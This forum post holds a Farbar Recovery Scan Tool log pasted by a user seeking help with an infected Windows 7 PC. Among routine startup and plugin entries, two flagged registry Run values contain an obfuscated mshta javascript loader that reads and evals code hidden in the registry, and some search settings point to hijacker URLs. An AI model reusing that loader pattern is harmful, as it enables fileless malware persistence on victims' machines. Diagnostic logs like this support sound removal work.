My apologies, here is the FRST.txt;
Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:13-07-2015
Ran by J. Powers (administrator) on DEMON-PC on 17-07-2015 18:02:50
Running from C:\Users\J. Powers\Downloads
Loaded Profiles: UpdatusUser & J. Powers (Available Profiles: UpdatusUser & J. Powers)
Platform: Windows 7 Home Premium Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 11 (Default browser: FF)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool:
==================== Processes (Whitelisted) =================
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
(Wacom Technology, Corp.) C:\Program Files\Tablet\Wacom\WTabletServicePro.exe
(ASUS) C:\Program Files (x86)\ASUS\ATK Package\ATK Hotkey\AsLdrSrv.exe
(ASUS) C:\Program Files (x86)\ASUS\ATK Package\ATKGFNEX\GFNEXSrv.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(SEIKO EPSON CORPORATION) C:\Program Files (x86)\Common Files\EPSON\EBAPI\eEBSvc.exe
(ASUSTek Computer Inc.) C:\Program Files (x86)\ASUS\ATK Package\ATK Hotkey\HControl.exe
(ASUS) C:\Program Files (x86)\ASUS\ATK Package\ATK Hotkey\ATKOSD.exe
(ASUS) C:\Program Files (x86)\ASUS\ATK Package\ATK Hotkey\KBFiltr.exe
(Wacom Technology, Corp.) C:\Program Files\Tablet\Wacom\Wacom_TabletUser.exe
(Wacom Technology) C:\Program Files\Tablet\Wacom\WacomHost.exe
(Wacom Technology, Corp.) C:\Program Files\Tablet\Wacom\Wacom_Tablet.exe
(Wacom Technology, Corp.) C:\Program Files\Tablet\Wacom\Wacom_TouchUser.exe
(ASUS) C:\Program Files (x86)\ASUS\ATK Package\ATK Hotkey\WDC.exe
(ASUSTek Computer Inc.) C:\Program Files (x86)\ASUS\USBChargerPlus\USBChargerPlus.exe
(ASUS) C:\Program Files\ASUS\P4G\BatteryLife.exe
(ASUSTek Computer Inc.) C:\Program Files (x86)\ASUS\ATK Package\ATKOSD2\ATKOSD2.exe
(ASUS) C:\Program Files (x86)\ASUS\InstantOn for NB\InsOnSrv.exe
() C:\Program Files\ASUS\Rotation Desktop for G Series\AsusUacSvc.exe
(ASUS) C:\Program Files (x86)\ASUS\InstantOn for NB\InsOnWMI.exe
(Atheros Commnucations) C:\Program Files (x86)\Bluetooth Suite\AdminService.exe
(Microsoft Corporation) C:\Windows\System32\GWX\GWX.exe
(Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) ME FW Recovery Agent\bin\ismagent.exe
(Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office 15\ClientX64\officeclicktorun.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(SEIKO EPSON CORPORATION) C:\Program Files\Common Files\EPSON\EPW!3 SSRP\E_S50STB.EXE
(SEIKO EPSON CORPORATION) C:\Program Files\Common Files\EPSON\EPW!3 SSRP\E_S50RPB.EXE
(ASUSTek Computer Inc.) C:\Program Files (x86)\ASUS\ASUS Fan Filter Checker\FanChkSrv.exe
() C:\Users\J. Powers\AppData\Local\Amazon Cloud Player\Amazon Music Helper.exe
(Skype Technologies S.A.) C:\Program Files (x86)\Skype\Phone\Skype.exe
(ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\ASUS Live Update\LiveUpdate.exe
(ooVoo LLC) C:\Program Files (x86)\ooVoo\ooVoo.exe
(VIA) C:\Program Files (x86)\VIA\VIAudioi\VDeck\VDeck.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe
(ASUS) C:\Program Files (x86)\ASUS\ATK Package\ATK Media\DMedia.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\Platform\McUICnt.exe
(ASUS) C:\Program Files (x86)\ASUS\ATK Package\ATK Hotkey\HControlUser.exe
(ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\Wireless Console 3\wcourier.exe
() C:\Program Files (x86)\Roxio\CinePlayer\5.0\CPMonitor.exe
(McAfee, Inc.) C:\Program Files\McAfee Security Scan\3.8.150\SSScheduler.exe
(ASUS) C:\Program Files (x86)\ASUS\Splendid\ACMON.exe
(ASUS) C:\Windows\AsScrPro.exe
(CyberLink) C:\Program Files (x86)\CyberLink\Power2Go\CLMLSvc.exe
(ASUSTeK) C:\Windows\SysWOW64\ACEngSvr.exe
(SEIKO EPSON CORPORATION) C:\Program Files (x86)\Epson Software\Event Manager\EEventManager.exe
(Intel(R) Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft LifeCam\LifeExp.exe
() C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\Jhi_service.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Eastman Kodak Company) C:\Program Files (x86)\Kodak\AiO\Center\EKAiOHostService.exe
(Eastman Kodak Company) C:\Program Files (x86)\Kodak\AiO\StatusMonitor\EKPrinterSDK.exe
(McAfee, Inc.) C:\Program Files (x86)\McAfee\SiteAdvisor\mcsacore.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\SystemCore\mfemms.exe
(McAfee, Inc.) C:\Windows\System32\mfevtps.exe
(McAfee, Inc.) C:\Windows\System32\mfevtps.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\AMCore\mcshield.exe
(Microsoft Corporation) C:\Program Files\Microsoft LifeCam\MSCamS64.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\SystemCore\mfefire.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe
(Razer Inc.) C:\Program Files (x86)\Razer\RzWizard\RzWizardService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\ink\InputPersonalization.exe
(VIA Technologies, Inc.) C:\Windows\System32\ViakaraokeSrv.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Atheros) C:\Program Files (x86)\Bluetooth Suite\Ath_CoexAgent.exe
(McAfee, Inc.) C:\Program Files\McAfee\MSC\McAPExe.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\SystemCore\mfefire.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\CSP\1.5.495.0\McCSPServiceHost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
(Intuit Inc.) C:\Program Files (x86)\Common Files\Intuit\Update Service\IntuitUpdateService.exe
(Intuit Inc.) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(McAfee, Inc.) C:\Program Files\McAfee\MAT\McPvTray.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
(Microsoft Corporation) C:\Windows\System32\SndVol.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(McAfee, Inc.) C:\Program Files (x86)\McAfee\SiteAdvisor\saUI.exe
(Adobe Systems, Inc.) C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerPlugin_18_0_0_209.exe
(Adobe Systems, Inc.) C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerPlugin_18_0_0_209.exe
(Microsoft Corporation) C:\Windows\System32\taskmgr.exe
(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
==================== Registry (Whitelisted) ==================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\...\Run: [AtherosBtStack] => CK.EXE"
HKLM\...\Run: [AthBtTray] => Y.EXE"
HKLM\...\Run: [AmIcoSinglun64] => MICOSINGLUN64.EXE
HKLM\...\Run: [SynTPEnh] => .EXE
HKLM\...\Run: [AdobeAAMUpdater-1.0] => RTUPUTILITY.EXE"
HKLM\...\Run: [Nvtmru] => TE CORE\NVTMRU.EXE"
HKLM\...\Run: [ShadowPlay] => RT
HKLM-x32\...\Run: [ASUSPRP] => C:\Program Files (x86)\ASUS\APRP\APRP.EXE [3331312 2012-02-17] (ASUSTek Computer Inc.)
HKLM-x32\...\Run: [HDAudDeck] => C:\Program Files (x86)\VIA\VIAudioi\VDeck\VDeck.exe [5138032 2012-03-30] (VIA)
HKLM-x32\...\Run: [USB3MON] => C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe [291608 2012-02-06] (Intel Corporation)
HKLM-x32\...\Run: [ATKOSD2] => C:\Program Files (x86)\ASUS\ATK Package\ATKOSD2\ATKOSD2.exe [322176 2012-02-16] (ASUSTek Computer Inc.)
HKLM-x32\...\Run: [ATKMEDIA] => C:\Program Files (x86)\ASUS\ATK Package\ATK Media\DMedia.exe [174720 2011-10-24] (ASUS)
HKLM-x32\...\Run: [HControlUser] => C:\Program Files (x86)\ASUS\ATK Package\ATK Hotkey\HControlUser.exe [105016 2009-06-19] (ASUS)
HKLM-x32\...\Run: [Wireless Console 3] => C:\Program Files (x86)\ASUS\Wireless Console 3\wcourier.exe [2321072 2012-02-02] (ASUSTeK Computer Inc.)
HKLM-x32\...\Run: [CPMonitor] => C:\Program Files (x86)\Roxio\CinePlayer\5.0\CPMonitor.exe [84464 2011-05-22] ()
HKLM-x32\...\Run: [ACMON] => C:\Program Files (x86)\ASUS\Splendid\ACMON.exe [102568 2012-02-06] (ASUS)
HKLM-x32\...\Run: [ASUS Screen Saver Protector] => C:\Windows\AsScrPro.exe [3058304 2012-08-01] (ASUS)
HKLM-x32\...\Run: [CLMLServer] => C:\Program Files (x86)\CyberLink\Power2Go\CLMLSvc.exe [107816 2010-08-20] (CyberLink)
HKLM-x32\...\Run: [mcui_exe] => C:\Program Files\McAfee.com\Agent\mcagent.exe [616272 2015-05-13] (McAfee, Inc.)
HKLM-x32\...\Run: [AdobeCS5ServiceManager] => C:\Program Files (x86)\Common Files\Adobe\CS5ServiceManager\CS5ServiceManager.exe [402432 2010-07-22] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [SwitchBoard] => C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [EEventManager] => C:\Program Files (x86)\Epson Software\Event Manager\EEventManager.exe [976320 2009-12-03] (SEIKO EPSON CORPORATION)
HKLM-x32\...\Run: [RzWizard] => C:\Program Files (x86)\Razer\RzWizard\RzWizard.exe [254464 2014-10-19] (Razer Inc.)
HKLM-x32\...\Run: [LifeCam] => C:\Program Files (x86)\Microsoft LifeCam\LifeExp.exe [119152 2010-05-20] (Microsoft Corporation)
HKLM-x32\...\Run: [**94ee119e<*>] => mshta javascript:ScucY2w="i8IlP6g";T9L5=new%20ActiveXObject("WScript.Shell");ijGN50iRR="plWHz";QiH5H=T9L5.RegRead("HKLM\\software\\Wow6432Node\\e6a2881f\\84f4448c");naAD65DL="Vq";eval(QiH5H);yDe5xQKsv (the data entry has 11 more characters). <===== ATTENTION (Value Name with invalid characters)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [334896 2015-06-08] (Oracle Corporation)
Winlogon\Notify\ScCertProp: wlnotify.dll [X]
HKLM\...\Policies\Explorer\Run: [] =>
HKLM\...\Policies\Explorer: [NoControlPanel] 0
HKLM\...\Policies\Explorer: [NoFolderOptions] 0
HKU\S-1-5-21-3654736093-338424075-1572945638-1002\...\Run: [AdobeBridge] => [X]
HKU\S-1-5-21-3654736093-338424075-1572945638-1002\...\Run: [Epson Stylus NX420(Network)] => C:\Windows\system32\spool\DRIVERS\x64\3\E_IATIGCA.EXE [224768 2009-09-14] (SEIKO EPSON CORPORATION)
HKU\S-1-5-21-3654736093-338424075-1572945638-1002\...\Run: [Amazon Cloud Player] => C:\Users\J. Powers\AppData\Local\Amazon Cloud Player\Amazon Music Helper.exe [3145536 2013-12-12] ()
HKU\S-1-5-21-3654736093-338424075-1572945638-1002\...\Run: [Skype] => C:\Program Files (x86)\Skype\Phone\Skype.exe [28782208 2015-06-02] (Skype Technologies S.A.)
HKU\S-1-5-21-3654736093-338424075-1572945638-1002\...\Run: [ooVoo.exe] => C:\Program Files (x86)\ooVoo\oovoo.exe [36207136 2015-02-08] (ooVoo LLC)
HKU\S-1-5-21-3654736093-338424075-1572945638-1002\...\Run: [**94ee119e<*>] => mshta javascript:d9ZJuvP3dy="iQk";cu56=new%20ActiveXObject("WScript.Shell");LFWDTEi1="Fu";FLm1w=cu56.RegRead("HKCU\\software\\e6a2881f\\84f4448c");WG5yxTq="zGvYJl4";eval(FLm1w);Xly5cs5e="gLH"; <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-3654736093-338424075-1572945638-1002\...\Policies\Explorer: [NoFolderOptions] 0
HKU\S-1-5-21-3654736093-338424075-1572945638-1002\...\Policies\Explorer: [NoControlPanel] 0
HKU\S-1-5-21-3654736093-338424075-1572945638-1002\...\MountPoints2: {619d0889-2d0a-11e2-85d9-e0b9a5fb19ef} - F:\setup.exe -a
HKU\S-1-5-21-3654736093-338424075-1572945638-1002\...\MountPoints2: {ee347677-31af-11e3-ad2a-e0b9a5fb19ef} - F:\VZW_Software_upgrade_assistant.exe
HKU\S-1-5-18\...\RunOnce: [KodakHomeCenter] => C:\Program Files (x86)\Kodak\AiO\Center\AiOHomeCenter.exe [2236792 2013-03-15] (Eastman Kodak Company)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\AsusVibeLauncher.lnk [2012-02-17]
ShortcutTarget: AsusVibeLauncher.lnk -> C:\Program Files (x86)\ASUS\AsusVibe\AsusVibeLauncher.exe (ASUSTeK Computer Inc.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\McAfee Security Scan Plus.lnk [2014-02-16]
ShortcutTarget: McAfee Security Scan Plus.lnk -> C:\Program Files\McAfee Security Scan\3.8.150\SSScheduler.exe (McAfee, Inc.)
==================== Internet (Whitelisted) ====================
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKU\S-1-5-21-3654736093-338424075-1572945638-1002\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKU\S-1-5-21-3654736093-338424075-1572945638-1002\Software\Microsoft\Internet Explorer\Main,Default_Page_URL =
http://asus.msn.com
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
http://www.bing.com/search?q={searchTerms}&form=ASUTDF&pc=NP06&src=IE-SearchBox
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
http://www.bing.com/search?q={searchTerms}&form=ASUTDF&pc=NP06&src=IE-SearchBox
SearchScopes: HKLM -> {2f23ab71-4ac6-41f2-a955-ea576e553146} URL =
SearchScopes: HKLM -> {8CDE19E6-71C2-4B46-89B7-35F6A18C571A} URL =
http://us.yhs4.search.yahoo.com/yhs...0LzuyE&cr=997119123&a=wny_ir_15_25&os=Windows 7 Home Premium&p={searchTerms}
SearchScopes: HKLM -> {c9ab6446-7efc-47fe-966c-dc54324eff9f} URL =
SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
http://www.bing.com/search?q={searchTerms}&form=ASUTDF&pc=NP06&src=IE-SearchBox
SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
http://www.bing.com/search?q={searchTerms}&form=ASUTDF&pc=NP06&src=IE-SearchBox
SearchScopes: HKU\S-1-5-21-3654736093-338424075-1572945638-1002 -> DefaultScope {42740267-7172-4304-B00A-DC95DDB739FD} URL =
https://search.yahoo.com/search?fr=mcafee&type=C011US105D20140705&p={searchTerms}
SearchScopes: HKU\S-1-5-21-3654736093-338424075-1572945638-1002 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-21-3654736093-338424075-1572945638-1002 -> {29E17992-E3A4-40E4-A255-D85843B37E03} URL =
http://www.dregol.com/results.php?f...0CzyyC0DtAtD0CtB2QtN0A0LzuyE&cr=601187289&ir=
SearchScopes: HKU\S-1-5-21-3654736093-338424075-1572945638-1002 -> {42740267-7172-4304-B00A-DC95DDB739FD} URL =
https://search.yahoo.com/search?fr=mcafee&type=C011US105D20140705&p={searchTerms}
SearchScopes: HKU\S-1-5-21-3654736093-338424075-1572945638-1002 -> {8CDE19E6-71C2-4B46-89B7-35F6A18C571A} URL =
http://us.yhs4.search.yahoo.com/yhs...0LzuyE&cr=997119123&a=wny_ir_15_25&os=Windows 7 Home Premium&p={searchTerms}
SearchScopes: HKU\S-1-5-21-3654736093-338424075-1572945638-1002 -> {c9ab6446-7efc-47fe-966c-dc54324eff9f} URL =
http://us.yhs4.search.yahoo.com/yhs...zyzy&cr=1654865247&a=wncy_ir_15_25&os=Windows 7 Home Premium&p={searchTerms}
SearchScopes: HKU\S-1-5-21-3654736093-338424075-1572945638-1002 -> {F830EA36-C432-49D1-BA04-79A5FC51071F} URL =
https://www.google.com/search?q={searchTerms}
BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\OCHelper.dll [2015-05-19] (Microsoft Corporation)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2011-03-28] (Microsoft Corp.)
BHO: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2015-05-01] (Microsoft Corporation)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\URLREDIR.DLL [2015-05-28] (Microsoft Corporation)
BHO: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\GROOVEEX.DLL [2015-05-28] (Microsoft Corporation)
BHO-x32: ContributeBHO Class -> {074C1DC5-9320-4A9A-947D-C042949C6216} -> C:\Program Files (x86)\Adobe\Adobe Contribute CS5\Plugins\IEPlugin\contributeieplugin.dll [2010-03-27] (Adobe Systems, Inc.)
BHO-x32: MSS+ Identifier -> {0E8A89AD-95D7-40EB-8D9D-083EF7066A01} -> C:\Program Files\McAfee Security Scan\3.8.150\McAfeeMSS_IE.dll [2014-04-09] (McAfee, Inc.)
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_51\bin\ssv.dll [2015-07-14] (Oracle Corporation)
BHO-x32: CIESpeechBHO Class -> {8D10F6C4-0E01-4BD4-8601-11AC1FDF8126} -> C:\Program Files (x86)\Bluetooth Suite\IEPlugIn.dll [2011-12-29] (Atheros Commnucations)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2011-03-28] (Microsoft Corp.)
BHO-x32: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2015-05-01] (Microsoft Corporation)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office 15\root\Office15\URLREDIR.DLL [2015-05-27] (Microsoft Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_51\bin\jp2ssv.dll [2015-07-14] (Oracle Corporation)
Toolbar: HKLM-x32 - Contribute Toolbar - {517BDDE4-E3A7-4570-B21E-2B52B6139FC7} - C:\Program Files (x86)\Adobe\Adobe Contribute CS5\Plugins\IEPlugin\contributeieplugin.dll [2010-03-27] (Adobe Systems, Inc.)
Handler: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll [2015-07-03] (McAfee, Inc.)
Handler-x32: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll [2015-07-03] (McAfee, Inc.)
Handler: livecall - {828030A1-22C1-4009-854F-8E305202313F} - No File
Handler: msnim - {828030A1-22C1-4009-854F-8E305202313F} - No File
Handler-x32: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office 15\root\Office15\MSOSB.DLL [2015-02-03] (Microsoft Corporation)
Handler: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll [2015-07-03] (McAfee, Inc.)
Handler-x32: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll [2015-07-03] (McAfee, Inc.)
Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll [2014-05-02] (Skype Technologies)
Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2015-05-01] (Microsoft Corporation)
Handler-x32: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2015-05-01] (Microsoft Corporation)
Filter: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\Program Files\McAfee\MSC\McSnIePl64.dll [2015-05-13] (McAfee, Inc.)
Filter-x32: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\Program Files (x86)\McAfee\MSC\McSnIePl.dll [2015-05-13] (McAfee, Inc.)
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{6422DE2B-80C0-47C3-B076-CDC7E8B1096D}: [DhcpNameServer] 192.168.42.129
Tcpip\..\Interfaces\{A809FC38-77AF-45EB-8338-30872558E6F9}: [DhcpNameServer] 192.168.1.1
StartMenuInternet: IEXPLORE.EXE - iexplore.exe
FireFox:
========
FF ProfilePath: C:\Users\J. Powers\AppData\Roaming\Mozilla\Firefox\Profiles\r7t3wel5.default-1419397623955
FF DefaultSearchEngine.US: Google
FF Homepage:
https://google.com/
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_18_0_0_209.dll [2015-07-14] ()
FF Plugin: @java.com/DTPlugin,version=10.25.2 -> C:\Windows\system32\npDeployJava1.dll [2013-08-25] (Oracle Corporation)
FF Plugin: @mcafee.com/MSC,version=10 -> c:\PROGRA~1\mcafee\msc\NPMCSN~1.DLL [2015-05-13] ()
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.40416.0\npctrl.dll [2015-04-16] ( Microsoft Corporation)
FF Plugin: @wacom.com/wtPlugin,version=2.1.0.2 -> C:\Program Files\TabletPlugins\npWacomTabletPlugin.dll [2012-05-23] (Wacom)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_18_0_0_209.dll [2015-07-14] ()
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=2.0.59 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2012-01-06] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2012-01-06] (Intel Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=11.51.2 -> C:\Program Files (x86)\Java\jre1.8.0_51\bin\dtplugin\npDeployJava1.dll [2015-07-14] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.51.2 -> C:\Program Files (x86)\Java\jre1.8.0_51\bin\plugin2\npjp2.dll [2015-07-14] (Oracle Corporation)
FF Plugin-x32: @mcafee.com/MSC,version=10 -> c:\PROGRA~2\mcafee\msc\NPMCSN~1.DLL [2015-05-13] ()
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.40416.0\npctrl.dll [2015-04-15] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office 15\root\Office15\NPSPWRAP.DLL [2013-07-11] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2011-05-13] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3538.0513 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2011-05-13] (Microsoft Corporation)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2013-11-11] (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2013-11-11] (NVIDIA Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.28.1\npGoogleUpdate3.dll [2015-07-17] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.28.1\npGoogleUpdate3.dll [2015-07-17] (Google Inc.)
FF Plugin-x32: @wacom.com/wtPlugin,version=2.1.0.2 -> C:\Program Files (x86)\TabletPlugins\npWacomTabletPlugin.dll [2012-05-23] (Wacom)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2015-06-29] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-3654736093-338424075-1572945638-1002: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\J. Powers\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll [2015-04-27] (Unity Technologies ApS)
FF Plugin HKU\S-1-5-21-3654736093-338424075-1572945638-1002: wacom.com/WacomTabletPlugin -> C:\Program Files\TabletPlugins\npWacomTabletPlugin.dll [2012-05-23] (Wacom)
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\browser\searchplugins\McSiteAdvisor.xml [2014-12-23]
FF Extension: Set Search Settings - C:\Users\J. Powers\AppData\Roaming\Mozilla\Firefox\Profiles\r7t3wel5.default-1419397623955\Extensions\{9b7d4705-916e-4168-b535-1f5315e44b47} [2015-06-17]
FF Extension: Adblock Edge - C:\Users\J. Powers\AppData\Roaming\Mozilla\Firefox\Profiles\r7t3wel5.default-1419397623955\Extensions\{fe272bd1-5f76-4ea4-8501-a05d35d823fc}.xpi [2015-01-01]
FF Extension: Skype Click to Call - C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{82AF8DCA-6DE9-405D-BD5E-43525BDAD38A}.xpi [2015-07-04]
FF HKLM\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files (x86)\McAfee\SiteAdvisor
FF Extension: McAfee WebAdvisor - C:\Program Files (x86)\McAfee\SiteAdvisor [2014-03-22]
